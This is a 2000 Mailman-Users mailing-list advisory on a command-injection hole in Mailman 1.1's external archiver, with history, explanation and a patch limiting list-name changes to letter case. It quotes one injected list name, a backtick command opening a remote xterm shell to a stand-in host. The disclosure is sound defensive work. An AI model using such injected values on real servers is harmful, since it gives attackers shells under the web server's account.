[Mailman-Users] Mailman 1.1 + external archiver vulnerability
Christopher P. Lindsey
lindsey at mallorn.com
Fri Sep 8 21:16:12 CEST 2000
SUMMARY
Mailman from www.list.org is a mailing list manager with strong Web
functionality. If a site is running Mailman 1.1 with an external
archiving mechanism that uses the internal variable %(listname)s,
list administrators can run any command with the Webserver's
uid/gid.
A patch is available at the end of this message.
WHO'S VULNERABLE
Sites running versions prior to Mailman 1.2beta with external
archiving enabled.
HISTORY
This bug was reported to the developers in late November, 1999, and
was fixed in the CVS source tree. Newer beta versions of Mailman
are not susceptible, yet it has recently come to my attention
that the vulnerable 1.1 package is still available as a stable,
non-beta release on the Mailman site(s):
ftp://ftp.list.org/pub/mailman/
ftp://ftp.gnu.org/gnu/mailman/
DETAILS
Mailman has a mechanism that allows messages sent to a mailing list to
be pumped into some sort of external program. Traditionally this
involves some sort of Web-based archiver like MHonArc or hypermail.
To make the archiving more powerful, macros can be used based on
internal Mailman values. For example, list archives can be saved
on a per list basis with this line in $prefix/Mailman/mm_cfg.py:
PUBLIC_EXTERNAL_ARCHIVER = '(mhonarc -add -nolock -umask 023 -rcfile rc.%(listname)s -outdir /mnt/WWW/htdocs/lists/%(listname)s)'
The problem comes from the %(listname)s expansion. Since it's derived
from a value that can be set on a per list basis by the list administrator,
it's subject to tampering. Consider a list who's name was changed
to
`/usr/X11R6/bin/xterm -display myhost.example.com:0 -e /bin/csh`
by a list administrator. As soon as a message is sent to the list
this command will be executed, opening a remote xterm with a shell
running with the Web server's uid/gid. Any command available to the
Web server can be executed in this fashion.
Other variable names can be accessed if your PUBLIC_EXTERNAL_ARCHIVER
definition is configured to use them. The patch below will only
fix problems with %(listname)s expansion.
SOLUTION
Upgrade to a later version of Mailman, or install the supplied patch.
PATCH
This patch was provided my the Mailman developers and later cleaned up
to work against a stock 1.1 distribution. It works by only allowing
listowners to change case values within the name of their list.
Obviously a better long-term solution that sanitizes system calls, etc.
should be considered.
The purpose of this report is not to disrespect the Mailman
team or the software, but rather to warn users who have been
downloading the 1.1 package while waiting for the beta to emerge
as a final release.
Christopher Lindsey
lindsey at mallorn.com
Mallorn Computing, Inc.
-------------------- snip snip --------------------
*** admin.py.bak Mon Mar 13 21:03:53 2000
--- admin.py Mon Mar 13 21:04:51 2000
***************
*** 784,789 ****
--- 784,800 ----
val = cgi_info[property].value
value = GetValidValue(lst, property, kind, val, deps)
if getattr(lst, property) != value:
+ # TBD: Ensure that lst.real_name differs only in letter
+ # case. Otherwise a security hole can potentially be opened
+ # when using an external archiver. This seems ad-hoc and
+ # could use a more general security policy.
+ if property == 'real_name' and \
+ string.lower(value) <> string.lower(lst._internal_name):
+ # then don't install this value.
+ document.AddItem("""<p><b>real_name</b> attribute not
+ changed! It must differ from the list's name by case
+ only.<p>""")
+ continue
setattr(lst, property, value)
dirty = 1
#
-------------------- snip snip --------------------
More information about the Mailman-Users
mailing list